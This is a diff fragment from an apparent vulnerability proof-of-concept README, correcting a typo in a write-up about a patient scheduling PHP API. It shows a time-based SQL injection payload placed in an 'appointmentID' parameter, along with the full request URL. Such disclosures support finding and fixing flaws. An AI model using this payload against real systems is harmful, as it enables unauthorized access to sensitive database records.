rayficom/Proof-of-Concept/20260218/README.md

    AppointmentId: '%2b(select*from(select(sleep(0)))a)%2b'
    ```

-7. Attacker can manuplate the database to delay in 0 milli-second and access the unauthorized sensitive information.
+7. Attacker can manipulate the database to delay in 0 milli-second and access the unauthorized sensitive information.
    ```
    http://localhost/pqms/php/api_patient_schedule.php?appointmentID='%2b(select*from(select(sleep(0)))a)%2b'
    ```